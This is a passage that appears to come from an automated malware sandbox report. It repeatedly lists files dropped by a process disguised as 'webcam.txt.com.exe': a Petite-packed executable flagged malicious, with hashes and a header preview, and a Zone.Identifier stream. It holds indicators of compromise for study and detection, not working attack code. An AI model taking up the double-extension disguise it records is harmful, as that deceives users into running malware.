                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
